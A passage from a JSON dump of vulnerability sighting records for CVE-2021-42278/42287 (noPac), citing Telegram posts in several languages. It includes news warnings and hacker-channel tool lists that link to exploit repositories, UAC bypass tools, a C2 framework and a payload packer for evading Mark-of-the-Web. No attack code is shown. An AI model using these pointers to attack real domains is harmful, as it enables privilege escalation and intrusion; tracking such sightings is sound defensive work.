\u0441\u043e\u0432\u043e\u043a\u0443\u043f\u043d\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043b\u0435\u0433\u043a\u043e \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0434\u043e\u043c\u0435\u043d\u044b Windows.\n\n@tomhunter", "creation_timestamp": "2021-12-22T18:21:21.000000Z"}, {"uuid": "ab07e2d6-de75-45cc-8615-d5b9ee64fe78", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/ggfcvj/3004", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T08:37:30.000000Z"}, {"uuid": "c00b5cb4-3669-4e34-9aad-26d3fb4410ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": 
"published-proof-of-concept", "source": "https://t.me/m1swarr1or/29", "content": "CVE-2021-42287/CVE-2021-42278: impersonate DA from standard domain user\n\nScanner and exploit in C#:\nhttps://github.com/cube0x0/noPac\n\nPython exploit for Kali:\nhttps://github.com/WazeHell/sam-the-admin \n\n#exploit #git #pentest #redteam", "creation_timestamp": "2021-12-12T14:54:29.000000Z"}, {"uuid": "f5e1e139-633e-4430-af03-0f09b5624f7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/arpsyndicate/1198", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 108 entries related to CVE-2021-42287. Active Directory Domain Services Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.928080000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-04T12:00:54.000000Z"}, {"uuid": "878e09ac-fb3f-42b8-9021-4029a7a82a69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/anwar1213xx/1565", "content": "Microsoft warns that two recently reported security vulnerabilities in Active Directory, tracked as CVE-2021-42278 and CVE-2021-42287, could be 
exploited by attackers to take over unpatched Windows domain controllers.\n\nDetails: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:34.000000Z"}, {"uuid": "2eb08000-d3bc-4709-a143-5c7559e6f55c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/vHTtKQxmAT3f8pPJYMyZLW3MJn_6GFVTdkZIulMbNHlsBg", "content": "", "creation_timestamp": "2023-11-22T10:27:55.000000Z"}, {"uuid": "efdd5df0-ac9c-4954-8529-1c1e81b571e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/arpsyndicate/231", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 104 entries related to CVE-2021-42287. 
Active Directory Domain Services Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.926130000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-11-17T07:24:39.000000Z"}, {"uuid": "ade4c922-250f-45f3-85b2-488db5a4e29f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/piratesofyemen1213/236", "content": "Microsoft warns that two recently reported security vulnerabilities in Active Directory, tracked as CVE-2021-42278 and CVE-2021-42287, could be exploited by attackers to take over unpatched Windows domain controllers.\n\nDetails: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:19.000000Z"}, {"uuid": "248065f6-9458-46ed-8fb7-fa0f6f9a3065", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/GhostClanOfficial/301", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 
\ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConnect\n\nCommand and Control Framework\n\nhttps://github.com/skylerknecht/connect\n\nPackMyPayload\n\nEmerging Threat of Containerized Malware\n\nThis tool takes a file or directory as input and embeds it into an output file acting as an archive/container. It can serve as a Proof-of-Concept presenting the emerging risk of container file formats with embedded malware, as well as a helper for professional Red Team Operators to sharpen their Initial Access maneuvers.\n\nCurrently Threat Actors are known to smuggle their malware archived in various container file formats, to name a few:\n\n\u25ab\ufe0f 7zip\n\u25ab\ufe0f zip\n\u25ab\ufe0f ISO\n\u25ab\ufe0f IMG\n\nThey do that to get their payloads past file content scanners, but more importantly to avoid having the Mark-Of-The-Web flag on their files. There are various motives for why adversaries don't want MOTW on their files: Protected View in Microsoft Office was always among them.\n\nShould they provide a container file to their victims, a foundation for disabling VBA macros in Internet-originated Office documents might be bypassed.\n\nhttps://github.com/mgeeky/PackMyPayload\n\nScoutSuite\n\nScout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.\n\n\u25ab\ufe0f https://github.com/nccgroup/ScoutSuite\n\u25ab\ufe0f https://github.com/nccgroup/sadcloud\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using the ms-settings DelegateExecute registry key. 
This Visual Studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nPico-PIO-USB\n\nUSB host/device implementation using the PIO of the Raspberry Pi Pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nFsociety\n\nA Modular Penetration Testing Framework.\n\nhttps://github.com/fsociety-team/fsociety\n\nLORSRF\n\nlorsrf is just a web pen-testing tool that I wrote to find the parameters that can be used to find SSRF or out-of-band resource load by adding an OAST host like Burp Collaborator to the parameter value. Above all, the request that will be received in Burp Collaborator will be an HTTP request without any real pieces of information about the target. I was thinking about how I can get the vulnerable parameter/endpoint, hence I made a simple feature that allows you to add some pieces of information about the target in your OAST host as 
variables\n\nhttps://github.com/knassar702/lorsrf\n\nEval 2 Term\n\nhttps://github.com/She11Way/eval2term\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-03-22T10:44:27.000000Z"}, {"uuid": "bd21b051-99ca-4dc0-8a7f-ad85d4d3b995", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/arpsyndicate/1557", "content": "#ExploitObserverAlert\n\nCVE-2021-42287\n\nDESCRIPTION: Exploit Observer has 107 entries related to CVE-2021-42287. Active Directory Domain Services Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2021-42278, CVE-2021-42282, CVE-2021-42291.\n\nFIRST-EPSS: 0.924660000\nNVD-IS: 5.9\nNVD-ES: 2.8", "creation_timestamp": "2023-12-08T12:18:23.000000Z"}, {"uuid": "178d2a71-e014-4649-bbed-dbb85c23ac25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/pGbiHzrv9DzUjPi4Cg4I-69JMs7D-lD3Hjj7tMRZSaPrsg", "content": "", "creation_timestamp": "2021-12-16T15:05:58.000000Z"}, {"uuid": "4eafd9cb-66ad-499a-9858-21f70df3751b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/piratesofyemen/398", "content": "Microsoft warns that two recently reported security vulnerabilities in Active Directory, 
tracked as CVE-2021-42278 and CVE-2021-42287, could be exploited by attackers to take over unpatched Windows domain controllers.\n\nDetails: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T09:37:15.000000Z"}, {"uuid": "82f17cb9-74a7-4935-85b5-375852dc956e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/4OwSIIHM4Phzi6L1Q-57NlPfvr_pP-K8ZqCBqbr0RdiVmEc", "content": "", "creation_timestamp": "2025-04-29T17:00:10.000000Z"}, {"uuid": "bf1efb48-4cd2-4745-9da7-81a0a15863cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/XQnuNd5X8XmOjKF9F0Yu3FlXocPy2dUR7xXCx3NP2hXIbzk", "content": "", "creation_timestamp": "2025-04-26T23:00:05.000000Z"}, {"uuid": "cb67337d-a1c2-4004-a3b1-6f9485f84e3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2621", "content": "#Tools -\u00a0 \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 
\ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nConnect\n\nCommand and Control Framework\n\nhttps://github.com/skylerknecht/connect\n\nPackMyPayload\n\nEmerging Threat of Containerized Malware\n\nThis tool takes a file or directory as input and embeds it into an output file acting as an archive/container. It can serve as a Proof-of-Concept presenting the emerging risk of container file formats with embedded malware, as well as a helper for professional Red Team Operators to sharpen their Initial Access maneuvers.\n\nCurrently Threat Actors are known to smuggle their malware archived in various container file formats, to name a few:\n\n\u25ab\ufe0f 7zip\n\u25ab\ufe0f zip\n\u25ab\ufe0f ISO\n\u25ab\ufe0f IMG\n\nThey do that to get their payloads past file content scanners, but more importantly to avoid having the Mark-Of-The-Web flag on their files. There are various motives for why adversaries don't want MOTW on their files: Protected View in Microsoft Office was always among them.\n\nShould they provide a container file to their victims, a foundation for disabling VBA macros in Internet-originated Office documents might be bypassed.\n\nhttps://github.com/mgeeky/PackMyPayload\n\nScoutSuite\n\nScout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using the APIs exposed by cloud providers, Scout Suite gathers configuration data for manual inspection and highlights risk areas. Rather than going through dozens of pages on the web consoles, Scout Suite presents a clear view of the attack surface automatically.\n\n\u25ab\ufe0f https://github.com/nccgroup/ScoutSuite\n\u25ab\ufe0f https://github.com/nccgroup/sadcloud\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using the ms-settings DelegateExecute registry key. 
This Visual Studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nPico-PIO-USB\n\nUSB host/device implementation using the PIO of the Raspberry Pi Pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nFsociety\n\nA Modular Penetration Testing Framework.\n\nhttps://github.com/fsociety-team/fsociety\n\nLORSRF\n\nlorsrf is just a web pen-testing tool that I wrote to find the parameters that can be used to find SSRF or out-of-band resource load by adding an OAST host like Burp Collaborator to the parameter value. Above all, the request that will be received in Burp Collaborator will be an HTTP request without any real pieces of information about the target. I was thinking about how I can get the vulnerable parameter/endpoint, hence I made a simple feature that allows you to add some pieces of information about the target in your OAST host as 
variables\n\nhttps://github.com/knassar702/lorsrf\n\nEval 2 Term\n\nhttps://github.com/She11Way/eval2term\n\nJoin:\nhttps://t.me/dilagrafie\nhttps://t.me/HackerFactory\n\nWebsite:\nwww.ghostclan.org\n\n#InsoSec #cybersec \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-03-22T08:38:32.000000Z"}, {"uuid": "4e25a206-865b-458a-af8d-16ffe5a1e64f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/dilagrafie/2834", "content": "Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06\n\nMsSettingsDelegateExecute\n\nBypass UAC on Windows 10/11 x64 using the ms-settings DelegateExecute registry key. 
This Visual Studio project will compile a static x64 binary to test this issue.\n\nhttps://github.com/hackerhouse-opensource/MsSettingsDelegateExecute\n\niscsicpl_bypassUAC\n\nUAC bypass for x64 Windows 7-11\n\nhttps://github.com/zha0gongz1/iscsicpl_bypassUAC\n\nSysmonEnte\n\nThis is a POC attack on the integrity of Sysmon which emits a minimal amount of observable events even if a SACL is in place.\n\nTo our understanding, this attack is difficult to detect in environments where no security sensors other than Sysmon or the Windows Event Log are in use.\n\nFor more technical information on the attack and possible mitigations, please see our blogpost.\n\nhttps://github.com/codewhitesec/SysmonEnte\n\nPico-PIO-USB\n\nUSB host/device implementation using the PIO of the Raspberry Pi Pico (RP2040).\n\nhttps://github.com/sekigon-gonnoc/Pico-PIO-USB\n\nuosint\n\nFind The Profiles Of A Person On Social Networks\n\nWith this tool, you can see all the information from the target person's social networks which is publicly available. Many people think that this tool needs to be installed, so I will make a Telegram Bot so that information can be obtained more easily and there is no need to install anything or deal with any other problems, just simple and easy.\n\nhttps://github.com/uosint-project/uosint\n\nserver-status PWN\n\nA script that monitors and extracts requested URLs and clients connected to the service by exploiting publicly accessible Apache server-status instances.\n\nhttps://github.com/mazen160/server-status_PWN\n\nExploiting Misconfigured Apache server-status Instances with server-status_PWN:\nhttps://mazinahmed.net/blog/exploiting-misconfigured-apache-server-status-instances/\n\nChitchatter\n\nA free (as in both price and freedom) communication tool. 
It is designed with security and privacy in mind.\n\nhttps://github.com/jeremyckahn/chitchatter\n\nDemo:\nhttps://chitchatter.im/\n\nSwiss Cyber Defence\n\nExam Preparation for Cyber Security Specialist with Swiss Federal Diploma.\n\nhttps://github.com/phr85/swiss-cyber-defence\n\nnoPac\n\nExploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user\n\nhttps://github.com/Ridter/noPac\n\n#cve #exploit\n\nVulnerable Web App\n\nsqli-postgres-rce-privesc-hacking-playground\n\nThis is a free vulnerable app for novice pentesters & developers to experiment with SQL Injection vulnerability and privilege escalation.\n\nRecommended path:\n\u25ab\ufe0f exploit the SQLi vulnerability\n\u25ab\ufe0f get a shell via a vulnerable version of PostgreSQL\n\u25ab\ufe0f perform privilege escalation and become root \ud83e\udd42\n\nhttps://github.com/filipkarc/sqli-postgres-rce-privesc-hacking-playground\n\n#Tools\u00a0 \ud83d\udee0\ufe0f \ud835\udddb\ud835\uddee\ud835\uddf0\ud835\uddf8\ud835\uddf2\ud835\uddff\ud835\ude00 \ud835\uddd9\ud835\uddee\ud835\uddf0\ud835\ude01\ud835\uddfc\ud835\uddff\ud835\ude06", "creation_timestamp": "2023-04-03T08:51:04.000000Z"}, {"uuid": "405a3ec6-d617-44a2-b5ea-298833518afd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/_JBB2P7ziQrNJ4Dse1MxmwqNvcRRxo6Hvl1KnPWFL1nmQa0", "content": "", "creation_timestamp": "2022-09-28T14:56:36.000000Z"}, {"uuid": "deded1b3-f8c2-4036-87fb-749e1b89d183", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/611", "content": "CVE-2021-45608 | NetUSB RCE\nFlaw in Millions of End User 
Routers\nhttps://www.sentinelone.com/labs/cve-2021-45608-netusb-rce-flaw-in-millions-of-end-user-routers\n\nCVE-2021-42278 Domain Escalation - sAMAccountName\u00a0Spoofing\nhttps://pentestlab.blog/2022/01/10/domain-escalation-samaccountname-spoofing\n\nNew macOS vulnerability, \u201cpowerdir,\u201d could lead to unauthorized user data access\nhttps://www.microsoft.com/security/blog/2022/01/10/new-macos-vulnerability-powerdir-could-lead-to-unauthorized-user-data-access", "creation_timestamp": "2022-01-11T18:24:07.000000Z"}, {"uuid": "454b2b73-3aa6-4ad3-b8c6-0fa86b501127", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/550", "content": "Python implementation for #CVE-2021-42278 Active Directory Privilege Escalation\nhttps://github.com/ly4k/Pachine", "creation_timestamp": "2021-12-14T12:42:10.000000Z"}, {"uuid": "b76998e8-e9c9-4fde-9d58-bd51d1382f80", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/hacker_trick/542", "content": "#CVE-2021-42287 / #CVE-2021-42278 Scanner &amp; Exploiter\nhttps://github.com/cube0x0/noPac\n\nimpersonate DA from standard domain user\nhttps://github.com/WazeHell/sam-the-admin", "creation_timestamp": "2021-12-12T16:04:05.000000Z"}, {"uuid": "69c23287-bc2a-4a60-a362-20fc935a6d73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/ef4wbo4l4Rv2QiVrhNHWzlDYXi82eYKt40N4lamanJL8Uw", "content": "", "creation_timestamp": "2021-12-12T21:48:33.000000Z"}, {"uuid": "330ef22c-2eee-4fb1-8182-52dc415aab92", "vulnerability_lookup_origin": 
"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "seen", "source": "https://t.me/Tim_Mafia_Hackers_lslami/1691", "content": "\u062a\u062d\u0630\u0631 Microsoft \u0645\u0646 \u0623\u0646 \u0627\u062b\u0646\u064a\u0646 \u0645\u0646 \u0627\u0644\u062b\u063a\u0631\u0627\u062a \u0627\u0644\u0623\u0645\u0646\u064a\u0629 \u0627\u0644\u062a\u064a \u062a\u0645 \u0627\u0644\u0625\u0628\u0644\u0627\u063a \u0639\u0646\u0647\u0627 \u0645\u0624\u062e\u0631\u064b\u0627 - \u062a\u0645 \u062a\u0639\u0642\u0628\u0647\u0645\u0627 \u0643\u0640 CVE-2021-42278 \u0648 CVE-2021-42287 - \u0641\u064a Active Directory \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u063a\u0644\u0627\u0644\u0647\u0645\u0627 \u0645\u0646 \u0642\u0628\u0644 \u0627\u0644\u0645\u0647\u0627\u062c\u0645\u064a\u0646 \u0644\u0644\u0627\u0633\u062a\u064a\u0644\u0627\u0621 \u0639\u0644\u0649 \u0648\u062d\u062f\u0627\u062a \u062a\u062d\u0643\u0645 \u0645\u062c\u0627\u0644 Windows \u063a\u064a\u0631 \u0627\u0644\u0645\u0635\u062d\u062d\u0629.\n\n\u0627\u0644\u062a\u0641\u0627\u0635\u064a\u0644: https://thehackernews.com/2021/12/active-directory-bugs-could-let-hackers.html", "creation_timestamp": "2021-12-22T10:47:50.000000Z"}, {"uuid": "5c434dd4-c375-4af0-a587-d2bf552fe5b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "Telegram/8kfY5IrVwgv6d-jVaXidvd01teGjJ-EZbZhebbrlHOlDEw", "content": "", "creation_timestamp": "2021-12-21T02:40:26.000000Z"}, {"uuid": "dbb2d478-cc04-4698-bbd7-319315596f2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-42278", "type": "published-proof-of-concept", "source": "https://t.me/true_secator/2464", "content": 
"\u200b\u200b\u0412\u044b\u0448\u0435\u0434\u0448\u0438\u0439 \u0432 \u0441\u0432\u0435\u0442 PoC \u0434\u043b\u044f CVE-2021-42287 \u0438 CVE-2021-42278 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u0443\u044e \u043e\u0431\u0435\u0441\u043f\u043e\u043a\u043e\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0443 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u0438 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 Microsoft.\n \n\u0414\u0435\u043b\u043e \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0435 \u043d\u043e\u044f\u0431\u0440\u044c\u0441\u043a\u0438\u043c Patch Tuesday \u043e\u0448\u0438\u0431\u043a\u0438 Active Directory \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u0437\u0430\u0445\u0432\u0430\u0442\u044b\u0432\u0430\u0442\u044c \u0434\u043e\u043c\u0435\u043d\u044b Windows.\n \nMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u0435\u0442 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u043e\u0431\u043e\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 \u043a\u0440\u0430\u0442\u0447\u0430\u0439\u0448\u0438\u0435 \u0441\u0440\u043e\u043a\u0438. 
IT-\u0433\u0438\u0433\u0430\u043d\u0442 \u0442\u0430\u043a\u0436\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043b \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0435 \u0440\u0443\u043a\u043e\u0432\u043e\u0434\u0441\u0442\u0432\u043e \u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u0435 \u043f\u043e \u044d\u0442\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430\u043c.\n \n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2021-42278 \u0441 \u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0430\u043c\u0438 \u043f\u043e \u0443\u043c\u043e\u043b\u0447\u0430\u043d\u0438\u044e \u0434\u0430\u0435\u0442 \u043e\u0431\u044b\u0447\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u0440\u0430\u0437\u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043d\u0430 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0443\u0447\u0435\u0442\u043d\u043e\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430 (\u0434\u043e 10 \u043c\u0430\u0448\u0438\u043d), \u0438 \u043a\u0430\u043a \u0435\u0433\u043e 